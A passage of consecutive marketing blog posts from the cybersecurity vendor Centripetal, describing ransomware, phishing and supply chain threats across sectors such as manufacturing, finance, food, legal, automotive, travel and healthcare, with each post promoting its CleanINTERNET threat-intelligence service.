cyber threat visibility to organizations of all sizes, working at scale to analyze over 3,500 intelligence feeds and proactively shield against 99% of known cyber threats. Centripetal’s team of analysts works as an extension of your security staff by delivering actionable threat intelligence directly to your team, bridging the cybersecurity skills gap. By creating a Zero Trust environment within water utilities’ networks, CleanINTERNET reduces the risk of non-compliance and its associated financial and reputational damage. Find out more about CleanINTERNET for the utilities sector here and get in touch with the Centripetal team to discuss your cyber requirements. --- ### [The Impact of Supply Chain Cyber Attacks](https://www.centripetal.ai/blog/the-impact-of-supply-chain-cyber-attacks) Published: 2022-04-28 Summary: And supply chain cyber attacks are becoming increasingly commonplace rising by 42% in the first quarter of 2021 alone. Supply chains encompass virtually every business in every industry. Built not just around the flow of goods and services, but the flow of information, supply chains exist wherever a transaction takes place, spanning each step from production to delivery. Given their interdependent nature, compromising a business supply chain can be a lucrative technique for cyber attackers, as one breach can be a potential way into multiple targets at once. And they’re becoming increasingly commonplace; supply chain cyber attacks rose by 42% in the first quarter of 2021 alone. How do hackers target the supply chain? Hackers take advantage of the trust between organizations up and down the supply chain; if an organization has a stronger cybersecurity posture, but one of its trusted partners doesn’t, malicious actors will find and target that partner. Establishing a foothold in this partner’s network can allow attackers to gain access to the more secure network. More than half of supply chain attacks come from established advanced persistent threat (APT) actors, who are experienced in continually evolving and intensifying attack methods to avoid detection and reach new targets. And after supply chains across the world have been challenged with soaring demand, port congestion, and manufacturing delays throughout the past year, there’s a risk that systems will become even more fragile and susceptible to attack. The software supply chain The software supply chain in particular has seen a huge increase in attacks, experiencing 12,000 incidents in 2021 alone. It is especially vulnerable as software is rarely written from scratch, involving off-the-shelf components like third-party APIs, open-source components, and proprietary code. With 90% of all applications containing open-source code and 11% of these having known vulnerabilities, it’s clear that a single vulnerability can threaten countless organizations. And as code is reused, these vulnerabilities live on beyond the original software's lifecycle. In December 2021, vulnerabilities in Log4j, a popular open-source piece of code, allowed hackers to target systems running the software with malicious code, taking control of vulnerable devices and leaving many organizations, governments, and individuals exposed. High-profile supply chain attacks While software supply chain vulnerabilities have been surfacing for some time, recent attacks on prominent application providers have gained national attention. One such incident is the SolarWinds attack, which saw hackers target up to 18,000 customers of the networking tools vendor SolarWinds. The nation-state attackers injected malicious code into the company’s software build cycle, creating a backdoor to thousands of customers’ networks. Taking advantage of multiple supply chain layers, the attack resulted in major corporations like NASA, Microsoft, and the US Justice Department having their data exposed, costing cyber insurance companies up to $90 million. And SolarWinds wasn’t the first supply chain attack to shake the security industry. The NotPetya attack in 2017 saw malware within compromised Ukrainian accounting software spread to various other countries via the supply chain. The incident disrupted corporations such as Maersk and FedEx, causing several days of operational downtime and more than $10 billion in damage. Securing the supply chain 84% of security professionals believe that software supply chain attacks could become one of the biggest cyber threats to their business within the next three years. To mitigate the supply chain risks that are making organizations vulnerable to attack, organizations need visibility across any code dependencies within the applications they use, be it commercial, open-source, cloud, or mobile. They also need to be able to effectively prevent new and emerging threats from hitting their business by employing expert threat intelligence. Centripetal’s CleanINTERNET service provides a fully-managed service that automatically shields malicious inbound and outbound traffic, as well as aggregating cyber threat intelligence from over 3,500 threat feeds to predict and detect emerging threats. The CleanINTERNET service includes a team of dedicated analysts that act as an extension of your security team, helping to bridge the cybersecurity skills gap. By creating a Zero Trust environment, CleanINTERNET shields your organization from 99% of threats known and mapped by the global threat intelligence community, including vulnerabilities like the Log4j incident. This way, you protect your customer data, your reputation, and your partner relationships. Find out more about preventing supply chain cyber attacks by getting in touch with the Centripetal team --- ### [How Does IIOT Impact Cybersecurity In Manufacturing?](https://www.centripetal.ai/blog/what-is-iiot-and-how-does-it-impact-cybersecurity-in-manufacturing) Published: 2022-04-14 Summary: The Industrial Internet of Things (IIoT), a sub-category of the Internet of Things (IoT), has been transformative for many industries. The Industrial Internet of Things (IIoT), a sub-category of the Internet of Things (IoT), has been transformative for many industries. A market sized at over $263 billion in 2021, IIoT encompasses sensor-embedded devices, cloud-based data, and interconnected machines which reduce downtime, improve performance, and lower costs. Manufacturing firms are leading the charge in IoT adoption; of the forecast 83 billion connected IoT devices by 2024, 70% of these are expected to be in the industrial sector. How does the manufacturing sector use IIoT? 1. Maintenance Prediction As well as being able to pinpoint live issues, connected sensors can help manufacturers predict when a machine will likely break down. By gradually recognizing long-term patterns and identifying abnormal behavior earlier, predictive maintenance software helps limit downtime and improve safety. 2. Inventory Management IIoT enables manufacturers to track the location of inventory items, their movements in the supply chain, and the volume of materials required for a specific manufacturing cycle. Finding equipment within inventories is so time-consuming that one manufacturer found itself saving $3 million per year on each of its production lines once location-tracking sensors were installed. 3. Quality Control IIoT streamlines the quality control process with thermal and video sensors that can collect product data and test materials throughout different stages of the manufacturing cycle, catching and rectifying any flaws before the product reaches the market. 4. Worker Safety IoT-enabled wearable devices can be used to monitor employees’ health metrics while working on the factory floor. Collecting data on stress levels, heart rate, and fatigue can help business owners optimize the safety and wellbeing of their workers. Cybersecurity and IIoT Despite its clear benefits, IIoT has made manufacturing systems a perfect target for cybercriminals. Hackers are better able to exploit the larger attack surface of these systems, with incidents targeting Operational Technology (OT) environments increasing by over 2,000% in 2021. And many security issues stem from gaps in protection such as exposed ports, inadequate authentication, and legacy applications that have become obsolete; 47% of attacks on manufacturing are caused by vulnerabilities that the organization had not or could not patch. These challenges have caused attacks like ransomware and server access to increase dramatically across the manufacturing industry. In 2021, manufacturing experienced more ransomware attacks than any other industry, overtaking financial services and insurance. In targeting the manufacturing industry, hackers aim to cause disruption throughout the supply chain, affecting partners and customers and pressuring the organization into paying the ransom. Even if victims refuse to pay a ransom, the financial impact can be crippling. Norsk Hydro, one of the world’s largest producers of lightweight metals, was forced to halt production after falling victim to a ransomware attack, costing the organization $52 million in lost revenue. And these disruption-related costs are often passed down to consumers through supply and demand imbalance, for instance when wholesale meat prices spiked in 2021 after a ransomware attack on JBS Foods, the world’s largest meat processing company. Securing IIoT for manufacturers For manufacturers to secure their IIoT infrastructure and protect their client data, IP, and reputation within the industry, they need to understand the current and potential threats to their business. Centripetal’s CleanINTERNET service works at massive scale and machine speed to aggregate over 3,500 cyber threat feeds, proactively shielding against 99% of attacks identified by the global threat intelligence community. The Centripetal team then provides comprehensive findings on emerging threats via our team of threat analysts, enabling overburdened teams to focus on other business activities. By creating a Zero Trust environment, CleanINTERNET helps manufacturers comply with security standards such as the GDPR, ISO/IEC 27000, and ISO 15408. By operationalizing threat intelligence, CleanINTERNET provides manufacturers with customizable intelligence and superior protection against all known risks and zero-day threats. Find out more about IIoT here and get in touch with the Centripetal team for more information about CleanINTERNET and its applications. --- ### [Threat Intelligence Provides Better Security for the Finance Sector](https://www.centripetal.ai/blog/how-cyber-threat-intelligence-as-a-fully-managed-service-can-provide-better-security-for-the-finance-sector) Published: 2022-04-11 Summary: A new generation of cyber threat intelligence has helped the finance sector by providing better visibility of the evolving threat landscape. The financial sector continues to be one of the most heavily attacked industries, so it makes sense that it consistently spends more than others on cybersecurity. Bank of America, for instance, claimed just last year that it spends more than a billion dollars a year in cybersecurity. Much of that, no doubt, inspired by the 1,300% increase in ransomware attacks. Cybercriminals are targeting more banks with ransomware attacks because they know most banks and their wealthy clients can afford to pay the hefty ransoms to keep their personal details private. It makes sense then that the industry is willing to spare no expense to ensure the sensitive information of rich and powerful clients remains private even in the event of a cyber attack. A new generation of cyber threat intelligence (CTI) and network inspection tools have helped in this fight by providing better visibility of the evolving threat landscape. But visibility isn’t enough. All of these threats need to be analyzed and ranked either by machines or humans, so decisions can be made about how to deal with them. Someone or something, rather, has to aggregate, filter, correlate, and rank them before taking action. Many are mistakenly identified as threats or are considered harmless, while others are ticking timebombs ready to explode. And the sheer volume of new and existing threats makes this process increasingly difficult to keep up with. This is a challenge even for companies with security budgets large enough to acquire the best tools and hire a team of skilled threat analysts. Having the latest technology helps, but the best intelligence is only as good as the team’s ability to use it. Moreover, with most solutions focusing on identifying and stopping threats from outside the network, how can a financial institution make sure it’s providing the same level of protection from potential threats coming from within the organization? Operationalizing threat intelligence is the key. According to the most recent Data Breach Investigations Report from Verizon, 44% of the breaches at financial firms were caused by internal actors. While the majority of incidents by internal actors were accidental, a capable CTI solution certainly would have recognized the Indicators of Compromise (IoC) related to these accidental incidents to help prevent them. So either these companies didn’t have a solution in place, or the intelligence wasn’t acted on to prevent the breach. For their part, next-gen firewalls and other advanced network inspection tools are limited for two primary reasons. First, creating new rules for every evolving threat signature is increasingly difficult to keep up with, especially with malware variants multiplying so rapidly. Second, traffic inspection can only be done on unencrypted data packets, but the decryption/re-encryption process is very resource-intensive and can quickly overwhelm the devices doing this. The fix, of course, is to continue spending money on bigger devices or simply adding more of them. As you can imagine, that can get very expensive from a hardware perspective and a management perspective. Another option that IT teams often default to is foregoing these larger devices and instead using their existing solution to set arbitrary thresholds to determine which potential threats get blocked and which don’t. IT teams often let less risky traffic through because blocking it often means blocking legitimate traffic that was incorrectly flagged as malicious traffic. This is the tradeoff teams make everyday ‒ do they block all lower-risk traffic or err on the side of maintaining application performance? If a bank or insurance company is large enough to afford a full team of threat analysts on their SecOps team, they can be much more efficient in blocking the right traffic and reducing the exposure to seemingly innocuous threats. But we know most organizations don’t have that luxury with 95% of security professionals admitting that the skills shortage in their organizations continues to be a big problem. When you consider this and the fact that 44% of the breaches in the financial services industry were caused by internal actors, you can understand why traditional threat intel and network inspection solutions are not preventing attacks many consider to be totally preventable. The volume of alerts produced by these solutions is simply too much to analyze. Plus, the alerts are reactive in nature and designed to help analyze incidents after an event has occurred. A better solution is to prevent incidents from happening in the first place. Centripetal CleanINTERNET goes beyond traditional cyber threat intelligence with a fully managed service that automatically shields malicious inbound and outbound traffic from an organization’s network. In addition to its automated shielding, the service includes an elite team of threat hunting specialists that provides real-time protection through advanced threat detection (ATD). This type of cyber threat intelligence as a service greatly reduces the tremendous noise and false positives that regularly consume cybersecurity teams and helps overcome the persistent cybersecurity skills shortage. What’s more, by reducing all bad traffic from the network, the CleanINTERNET service shrinks the volume of events, alerts, and log data of firewall, IDS/IPS, and SIEM platforms by up to 70%, boosting the efficiency of existing security defenses. If you’re a bank or financial firm concerned about adequately protecting you and your customers, maybe it’s time to consider cyber threat intelligence as a service. We can show you how CleanINTERNET has helped smaller, midsized organizations like yours not only improve their cybersecurity but also reduce the cost and implementation traditionally associated with advanced threat protection. Contact the Centripetal Sales team here for more information. --- ### [Cyberattacks on Food and Agriculture](https://www.centripetal.ai/blog/cyberattacks-on-food-and-agriculture-how-hackers-target-our-most-critical-industry) Published: 2022-03-30 Summary: For the food and agriculture industry to avoid serious disruption, organizations need powerful but fully-managed cyber protection. How Hackers Target Our Most Critical Industry Our lives depend on the food and agriculture industry. It’s a vital part of our Critical National Infrastructure (CNI), and has huge financial value, contributing $1.055 trillion to the US GDP in 2020 (a 5% share). But hackers see the world’s dependence on food and agriculture as an opportunity to target the industry with cyberattacks to achieve either financial gain or social disruption. With this critical sector relying increasingly on digital systems and the interdependent nature of the world’s food supply chain, the entire industry should be protected with modern cyber defenses. An influx of ransomware attacks In May 2021 the world’s largest meat processing company, JBS Foods, was the victim of a cyberattack that sent shock waves across the industry. The attack was confirmed to be an instance of ransomware – one of the most prominent attacks on CNI. The attack halted operations at 13 meat plants around the world, triggering a huge supply and demand imbalance resulting in soaring meat prices across the US and forcing JBS to pay an $11 million ransom. Other recent cyber attacks on the industry include a ransomware attack on JFC International, a major wholesaler of Asian food products, and a data leak of non-profit food provider Loaves and Fishes, originally stemming from a ransomware attack on a partner. And in 2021, Ransomware-as-a-Service gang BlackMatter attempted to extort $5.9m from farming collective The New Cooperative at the height of the harvest season, a critical time for the industry. Smart farming The future of the food and agriculture industry will increasingly leverage the use of automation and connected systems to monitor land, treat crops, maximize yield, and minimize disease among livestock. The smart farming market is expected to grow to $26 billion by 2028 as farms and distributors increase their use of drones, GPS mapping, soil sensors, autonomous tractors, and other IoT devices. But as with smart manufacturing, smart farming gives attackers more opportunities to exploit misconfigurations, out-of-date firmware, or inherent vulnerabilities from small footprints, enabling them to take control of networks for sabotage or hold data to ransom. A fragile supply chain The world’s food supply chain is dominated by a relatively small number of large food companies, many of which are interdependent. Therefore, any attacks that expose customer and client data, or cause production downtime, reverberate along the supply chain. Retail stores and restaurants need an easily accessible and reliable source of food products, and any disruption can result in price spikes or shortages. As a result, shutting down any of the major food production or distribution businesses puts the industry in an intolerable condition, providing cybercriminals with a clear advantage. To avoid industry turmoil, businesses are more likely to pay a ransom, and pay it quickly, to get their systems back up and running. These risks are exacerbated by the fact that cybersecurity specialists are scarce across all industries, with the size of the workforce now 65% below what it needs to be. This lack of fully and regularly trained professionals in the industry can lead to poor security practices along the supply chain. And with email now a key attack vector for malware, including ransomware, it’s increasingly important for farmers, manufacturers, and distributors of all sizes to better educate their staff or outsource their security to a trusted partner. Shielding the food and agriculture industry For the food and agriculture industry to avoid serious industry disruption, remediation fees, non-compliance fines, IP theft, and reputational damage, organizations need a solution that offers powerful but fully-managed cyber protection. Centripetal’s CleanINTERNET service delivers just this, working at massive scale and machine speed to proactively shield organizations from 99% of known cyber threats. Our service works by aggregating over 5 billion global indicators of compromise (IOCs) from more than 3,500 feeds to automatically analyze and act on all inbound and outbound traffic in real-time. This takes the weight off your internal security team, helps meet compliance standards, and saves millions of dollars on separate cyber threat feeds. By providing superior protection against all known threats, our service creates a Zero Trust environment for food and agriculture businesses, building a stronger defense against threats like ransomware, phishing, advanced persistent threats, and supply chain attacks. Find out more about CleanINTERNET, and its applications in the food and agriculture industry, by getting in touch with the Centripetal team. --- ### [Protecting the Legal Sector with Cyber Threat Intelligence](https://www.centripetal.ai/blog/legal-sector-cyber-threat-intelligence) Published: 2022-03-26 Summary: With attacks constantly evolving, the legal sector needs to employ sophisticated cyber threat intelligence solutions that stop threats. There are very few organizations that hold as much sensitive and highly monetizable data as those in the legal sector. The American Bar Association states that law firms are “custodians of highly sensitive information, therefore inviting targets for hackers… and are facing a major professional responsibility and liability threat.” If hackers break into a law firm’s system, they gain access to the sensitive and valuable data of not just the firm but all its clients. These systems may hold valuable data including business intellectual property, medical records, and even classified government information. Cyber attacks are advancing in complexity and frequency and, as a result, 87% of law firms have seen an increase in the number of clients performing security audits on them, up from 72% in 2019. 62% of these audits have rated cyber threat levels at 70 or above. These include phishing, spear-phishing campaigns, ransomware, and man-in-the-middle attacks, often combining social engineering with advanced malware to outwit traditional defences. Unfortunately, many law firms rely on employees to spot cyber attacks and phishing emails themselves, with only 36% of legal organizations committing to cyber insurance policies. Additionally, many law firms are in the dark about whether they’ve been breached or not. The ABA Legal Technology Survey Report found that the larger the law firm, the more likely they are to answer “I don’t know” to questions about breaches and their cybersecurity efforts. By the time they realize a breach has taken place, significant damage may have already been done. For legal firms, a cyber breach can inflict more damage than just financial. Legal businesses are built upon strict confidence and trust from clients, and a breach, or just a potential breach, could seriously affect a firm’s reputation with their clients and within the industry. It could affect a case and put a client at a disadvantage, expose a company’s IP to a competitor, or even provide a backdoor to a clients’ system. For major law firms, the ability to secure clients’ data is vital to their standing in the industry. With attacks constantly evolving, the legal sector needs to move away from placing the burden of spotting cyber attacks on employees, and instead employ sophisticated cyber threat intelligence sources that stop both known and potential threats. Firms also have to consider regulatory compliance; the implementation of standards and guidelines like The National Institute of Standards and Technology (NIST) should be sufficient for firms to defeat a malpractice suit from a client whose data is breached. CleanINTERNET At Centripetal, we understand the risk to the legal sector and how cyber breaches affect firms of all sizes, which is why we developed our cyber threat intelligence solution, CleanINTERNET. CleanINTERNET aggregates, manages, and delivers thousands of cyber threat intelligence feeds directly to you, alleviating the burden on your security team and making your existing security tools more viable. Our zero-trust inspection of all traffic prevents network infiltration and data exfiltration, helping to mitigate the risk of non-compliance and the associated reputational damage. We offer immeasurable security at an affordable price, allowing your business to save millions of dollars on separate threat feeds. Get in touch with a member of our team to talk about how your business can benefit from CleanINTERNET. --- ### [How to Defeat Ransomware with ThreatOps](https://www.centripetal.ai/blog/how-to-defeat-ransomware-with-threatops-2) Published: 2022-03-22 Summary: ThreatOps is the process of operationalizing threat intelligence to shield against all known and emerging attacks. Over the last few years, we’ve seen quite an uptick around a host of new cyberthreat intelligence (CTI) solutions promising to help combat the steady rise in ransomware attacks. If you’re not familiar with them, CTI solutions were designed to collect publicly available cyberthreat data from across the globe that they could package and sell to large enterprises desperate for a better way to defend against potential cyberattacks. For their part, enterprises pay a monthly subscription to these intelligence feeds in the hopes that their internal security teams can analyze the information in the context of their own IT environments. A steady stream of intelligence data, combined with a team of skilled security analysts, would allow organizations to more effectively guard their networks from the recent surge in ransomware attacks, as well as other cyberthreats. To learn more, download our free eBook “Avoiding the Ransomware Trap”. Intelligence Is Only as Good as Your Ability to Use It The challenge for most businesses, however, is the effort and resources it takes to analyze the enormous volume of intelligence data effectively enough to stop potential threats before they grow into something bigger. With thousands of data sources and billions of indicators of compromise (IoCs) feeding these CTI solutions, the enterprise IT teams tasked with making use of it are simply overwhelmed by it. So much so that most firms only use it to educate themselves on the latest threats or to take corrective action after an incident occurs. And the prevailing wisdom is to subscribe to more than one CTI service, which doesn’t help the problem. Choosing Between Zero Threats & Network Performance  Another challenge businesses face is trying to match billions of IoCs with incoming network traffic in real-time can seriously drain network performance. Unlike the security teams who prefer to err on the side of caution and block or, at least, inspect suspicious traffic, their peers on the network team are less willing to do so for fear of degrading performance of the network for low-level threats, even though they might contribute to a breach. The give-and-take between these two teams and their conflicting goals routinely undermines the utility of a CTI solution. Formal Definition of Cyber Threat Intelligence Cyber threat intelligence (CTI) is what cyber threat information becomes once it has been collected, evaluated in the context of its source and reliability, and analyzed through rigorous and structured tradecraft techniques by those with substantive expertise and access to all-source information. (Source: Center for Internet Security) Transitioning from Threat Intelligence to ThreatOps It’s clear that while two generations of threat intelligence solutions unleashed an unprecedented view into the endless stream of cyberthreats, it has also exposed the scalability challenge of analyzing billions of threat indicators.  What we need is a way to enable organizations to make use of all of the intelligence available to them, so they can adequately protect themselves. Asking overworked security teams to add this level of data inspection and analysis is, quite frankly, unfair. Overcoming this fundamental scalability challenge means that we’re going to have to transition from threat intelligence to threat operations. We’re defining ThreatOps as the process of automatically shielding the organization against all known threats in real-time, while having experienced threat hunters available to analyze potential threats. Doing so will ensure that even the most innocuous threats are eliminated just as efficiently as the most dangerous ones. By evolving from traditional threat intelligence to ThreatOps, we can overcome the limitations of traditional CTI solutions. Instead of overwhelming them with more data than they can handle, an effective ThreatOps solution will systematically shield against all known threats while also providing a better defense against evolving and zero-day threats. ThreatOps is the process of operationalizing threat intelligence to shield against all known and emerging attacks. This is how we designed our CleanINTERNET solution. If you’re looking for a better way to use threat intelligence data from any CTI vendor, check us out. We can show you how we’ve helped organizations like yours automatically shield 99% of globally-mapped threats identified by the threat intelligence community. --- ### [Cybersecurity Risks in the Automotive industry](https://www.centripetal.ai/blog/cybersecurity-in-the-automotive-industry-what-are-the-risks) Published: 2022-03-03 Summary: The technology infrastructure needed to design, engineer, and build vehicles means the automotive industry is an ideal target for criminals. Today’s automotive industry is driven by tech, with each vehicle now employing over six times as many lines of code as a commercial jet. The sophisticated technology infrastructure needed to design, engineer, and build vehicles this complex means automotive manufacturers are an ideal target for cyber criminals. These malicious actors are constantly looking to destabilize operations and collect financial rewards through ransomware or theft, with cyber attacks predicted to cost the automotive industry $24 billion by 2023. Vehicles are constantly capturing not only outside data such as location, weather, and traffic conditions, but also driver data such as biometrics and mobile phone information. And with advancements like autonomous driving now in the not-so-distant future, points of entry for potential threats are multiplying, and malicious actors have more opportunities to target automotive companies along the entire supply chain. The importance of the supply chain The internal system of a vehicle contains more than 30,000 hardware components, manufactured predominantly by specialist third-party suppliers. OEMs (Original Equipment Manufacturers) often cannot scrutinize or control cybersecurity measures elsewhere along the chain, which opens their systems and data up to multiple exposure points for cyber criminals to exploit. One example of this is Toyota, which lost an unknown amount of valuable financial and customer data in 2021 after one of the company’s manufacturing partners, Auto Parts Manufacturing Mississippi, suffered a cyber attack. Challenged with compliance In the IT industry in general, computer and device manufacturers are not directly responsible for the cybersecurity of their products; it’s the responsibility of the enterprise to implement cybersecurity tools, and as a result, regulations and data privacy laws are enforced on the users. But in the automotive industry, OEMs are held directly accountable for failures in cybersecurity implementation. UNECE’s WP.29 regulation was the first of its kind for automotive manufacturers, requiring vehicular cybersecurity type approval. This means that all vehicles must now be assessed and qualified before being sold, adding to an already large number of existing, enterprise-focused security regulations including the General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA). 23% of companies in the US are actively working to comply with 11 or more privacy laws, making it a confusing and time-consuming process to meet all requirements, particularly for overstretched cybersecurity teams. The risk of ransomware Due to their larger attacks surfaces, complex supply chains, and security teams distracted by regulatory compliance, almost half (49%) of the top 100 automotive manufacturers are highly susceptible to ransomware attacks. Ransomware attacks can shut down entire manufacturing supply chains, as was the case with Kia Motors in 2021 when the DoppelPaymer gang demanded $20 million to not leak stolen data. The attack caused weeks of IT outages, operational disruption, and financial loss. Ransomware – or any kind of cyber attack that demonstrates a lack of control over data – also erodes consumer trust, with 80% of consumers claiming they would not buy from an automotive company that has been hacked. To protect the personal data of their customers, clients, and employees, automotive organizations need a solution that identifies and shields against both incoming and outgoing threats, securing the entire value chain. Centripetal’s solution, CleanINTERNET, shields automotive organizations from 99% of globally mapped cyber threats in real time, delivering comprehensive, actionable threat intelligence to you directly. With Centripetal’s team of cyber threat analysts working as an extension of your team, the threat of non-compliance is mitigated, and your team has more time to address mission-critical business activities. Our solution helps to create a Zero Trust environment for automotive manufacturers and suppliers, proactively preventing network infiltration and data exfiltration to secure your customers, supply chain partners, and reputation. Get in touch with our team to find out more about the CleanINTERNET solution and its capabilities in the automotive sector. --- ### [Ransomware Surges in Popularity](https://www.centripetal.ai/blog/ransomware-surges-in-popularity) Published: 2022-02-23 Summary: You might have noticed that ransomware attacks have seen a surge in popularity recently that most say will likely continue for some time. You might have noticed that ransomware attacks have seen a surge in popularity recently that most say will likely continue for some time. It’s not that ransomware attacks are new; the first documented ransomware attack was the AIDS trojan back in 1989. It’s just that they’ve become much easier for thieves to monetize with a tempting combination of “double extortion”, cryptocurrency, and ransomware code sharing by a global community of hackers that makes attacks much easier for even the laziest of cybercriminals. Ransomware Captures the Bronze These are the primary reasons ransomware has climbed to the number three spot in total breaches worldwide, according to the 2021 Verizon Data Breach Investigations Report. Along with that distinction, the number of ransomware attacks doubled from the prior year and now represent 10% of total breaches worldwide, despite the increased attention and funding businesses continue to spend on their layered security defenses. What is Ransomware? If you’re new to the world of cyberattacks, ransomware installs malware in a victim’s environment and encrypts whatever data an attacker can access and hold for ransom until the victim paid the ransom in exchange for the decryption key. More recently, however, attackers have discovered they could also blackmail their victims by threatening to share the sensitive data they acquired to publicly shame them into paying the ransom. This “double extortion” has now become the principal threat to companies that thought they had outsmarted these crooks by regularly backing up copies of their data.  As many victims will attest, a well-executed attack can cripple an organization for days and even disrupt the operations of its customers, as with the Kaseya attack. Ransomware attacks are now seen by many as an existential threat to the business community. To counter this, organizations need to not only make copies of their sensitive data, just in case, but also invest in tools to identify and prevent suspicious traffic from ever getting into the network in the first place. This is where intrusion detection, firewall, and other security gateways can help.  Cryptocurrency & Ransomware as a Service The popularity of cryptocurrency has also added to the attractiveness of ransomware attacks since demanding payment in bitcoin takes advantage of the anonymous and untraceable nature of cryptocurrency. In fact, ransomware payments through cryptocurrency totaled almost $350 million in 2020, which showed a 4x increase from the prior year. What we find most interesting, however, is the industrialization of the ransomware “business”. What was once a fiercely independent universe of hackers has evolved into a global tribe of collaborative businesses. The combination of bitcoin and the dark web has come together to enable entrepreneurial thieves to monetize their experience by packaging and selling the data and tools from prior attacks to the highest bidder. And business is booming!  The bottom line is that ransomware is not going anywhere. Criminals know there are plenty of businesses out there, new and old, that can’t possibly keep up with all the requirements needed to protect their networks in the era of hybrid-clouds, remote workers, and the virtual enterprise.  Where to start the defense The best defense against a debilitating attack is to deploy a defense-in-depth strategy that includes regular data backups and effective elimination of malicious traffic coming in and out of the network. To address the latter, a good place to start is to shield your business from every known threat identified by the global threat intelligence community.  CleanINTERNET can help by proactively shielding your network from 99% of globally-mapped threats identified by the threat intelligence community in near real time.  To learn more, download our free eBook “The Ransomware Elimination Diet”. --- ### [Why Hackers Target Airlines and The Travel Industry](https://www.centripetal.ai/blog/why-hackers-target-airlines) Published: 2022-02-15 Summary: The travel industry has been hit hard by cyber criminals, with fraud attempts on the sector increasing by 155.9% in 2021 alone. The travel industry has been hit hard by cyber criminals in the past couple of years, with cyber fraud attempts on the sector increasing by 155.9% in the second quarter of 2021 alone. Traditional enterprises like airlines and airports have always been a hot target for cyber criminals, accounting for some of the largest data breaches in the travel industry. And many hackers are exploiting the industry in response to the COVID-19 pandemic, assuming that the sector’s focus will be on complying with new public health guidelines, rather than protecting customer data. Why do hackers target the travel industry? Big breaches offer big rewards, and even in the wake of the COVID-19 pandemic the US travel industry is worth $545.11 billion and is responsible for some 15.7m jobs. The nature of the data that travel companies collect also makes the industry an attractive target. Personally identifiable information (PII) gleaned from passports, IDs, and travel itineraries can be used in identity theft, resale, and spear-phishing campaigns. And the prices that these records command reflect their value; US passport details can sell for as much as $3,500 on the dark web, in comparison with stolen driver’s license numbers, which are worth around $20. Another vulnerable form of currency are travel loyalty rewards, of which 1 billion dollars’ worth are stolen every year. Though they may not seem like a valuable target, most people don’t monitor their rewards programs closely, so these can be cashed quickly and lost forever — a low-risk, high-return treasure trove for hackers. The challenge of legacy systems Some of the biggest and most damaging breaches of passenger PII have been among airlines. In 2020, British airline EasyJet confirmed that the personal information of 9m customers had been breached. The incident was one of the largest breaches to impact a UK business, resulting in the theft of 2,208 credit card details. This followed the 2018 Cathay Pacific Airways breach, which affected 9.4m passengers and was found to be a result of unpatched internet-facing servers and the use of operating systems that were no longer supported by the developer. Similarly, British Airways were criticized for using legacy infrastructure for their core reservation and flight scheduling operations, which ultimately led to a 2018 data breach that cost the company £183m in fines. As well as costly fines, data breaches can result in grounded flights, the remote control of planes, reputational damage, and a loss of passenger confidence. The use of third-party providers for ticket booking, passenger processing, and boarding services can also increase the risk of cyber attacks. Airline technology provider SITA suffered a data breach in 2021 that accessed the Passenger Service Systems (PSS) of partners including Air New Zealand, United, Singapore Airlines, SAS, Cathay Pacific, and Finnair. The demand for digitalization Beyond the value of the data they hold, travel providers are also tasked with keeping up with customer demand for tech-enabled solutions like self-service kiosks, flight tracking technology, digital boarding passes, and mobile charging stations. But organizations need to balance convenience and safety, and the more data their passengers input into systems, the more damaging a potential breach can be. Additionally, 82% of travel bookings are now made online via a mobile app or website, without any human interaction. And with the online travel market continuing to grow, companies taking bookings digitally are potentially exposing more of their valuable customer PII to cyber criminals. Securing passengers and staff A 2020 survey found that only 55% of travel executives fully understood cybersecurity, 33% ‘partially’ understood, and 12% did not understand cybersecurity at all, with only 35% of airlines and 30% of airports seeing themselves as properly protected from cyber risks. But with 100% of carriers planning major cybersecurity overhauls by 2024, organizations should be looking to invest in protecting their passengers, easing cybersecurity efforts for their staff, and ultimately helping restore customer confidence post-pandemic. To find the balance between customer experience and cyber safety, organizations should be able to detect and predict cyber threats before they hit their systems. Centripetal CleanINTERNET draws from 3,500 separate threat feeds to shield your business from 99% of known threats, creating a Zero Trust environment. By analyzing threats for you and delivering the relevant findings through our threat analysts, we alleviate the security burden on internal teams and allow staff to focus on your customers and critical business activities. CleanINTERNET saves your business millions of dollars on separate cyber threat intelligence feeds, helping you proactively monitor the ever-changing threat landscape and secure your customers, employees, and reputation. Get in touch with our team to learn more about our cyber threat intelligence solution for the travel industry. --- ### [How Ransomware and Phishing Impact the Healthcare Sector](https://www.centripetal.ai/blog/how-ransomware-and-phishing-impact-the-healthcare-sector) Published: 2022-01-28 Summary: 89% of healthcare organizations worldwide have experienced a cybersecurity breach in the past 2 years. Healthcare organizations were overwhelmed with cyber attacks during 2020 and 2021, and hackers show no sign of abating in 2022. 89% of healthcare organizations worldwide have experienced a breach in the past two years, with cyber attacks on healthcare infrastructure increasing by 30% in Q3 of 2021 alone. Last year saw services like Scripps Health in the US and the National Health Service in Ireland experience weeks of downtime and service disruptions due to separate cyber attacks, threatening their patients’ health and privacy, as well as their reputation as a trusted care provider. Ransomware on the rise In 2021, ransomware impacted 1,203 sites across the US, including hospitals, hospices, clinics, education centers, blood banks, and more. Many of these organizations cannot or do not want to divert revenue and resources to cybersecurity when it could be used to buy medical equipment that directly relates to patient care. With investment focused on patients, little financial support is given to equipment updates or patches, meaning that the industry continues to use legacy and end-of-life systems which are more likely to be an easy entry point for attackers. And with teams often understaffed and overworked, particularly during the height of the COVID-19 pandemic, cybersecurity threats can be a lesser priority. Healthcare organizations’ pressure to ensure continuity of service and protect public image also makes the sector the most likely to pay a ransom; 34% of healthcare professionals whose data was encrypted admitted to paying the ransom compared with a cross-sector average of 32%. In 2020, the University Hospital in New Jersey paid up to $670,000 to prevent 240 GB worth of stolen files from being leaked. And even when organizations refuse to pay a ransom, the financial effects can be just as severe: the University of Vermont Medical Center lost $50 million in revenue and recovery after suffering a ransomware attack, despite never paying the ransom. Almost two-thirds of organizations have admitted that they’ve had to cancel in-person appointments due to a cyber attack, with healthcare providers also citing delayed procedures and an increase in patient transfers as consequences of these attacks. At worst, they can even lead to loss of life, as was the case at Springhill memorial Hospital in Alabama in 2020, when medical staff could not access fetal heart rate monitors. Phishing and email security The rise of email-related breaches in healthcare has been staggering. In 2012, just 4% of breaches involved email. In 2020, that number reached 42%, with one major California hospital experiencing a 700% increase in malicious email files entering their systems in October 2020 alone. The vast majority (91%) of cyber attacks begin with phishing emails, often used to infect healthcare providers with malware like ransomware. Hackers are motivated to carry out email attacks like phishing, spear phishing, and Business Email Compromise (BEC) for a number of reasons, namely the value of health industry data, with medical records sold on the black market for 50 times more than financial information. Phishing is prevalent in healthcare as it allows hackers to take advantage of often overworked professionals. And attacks have increased in light of 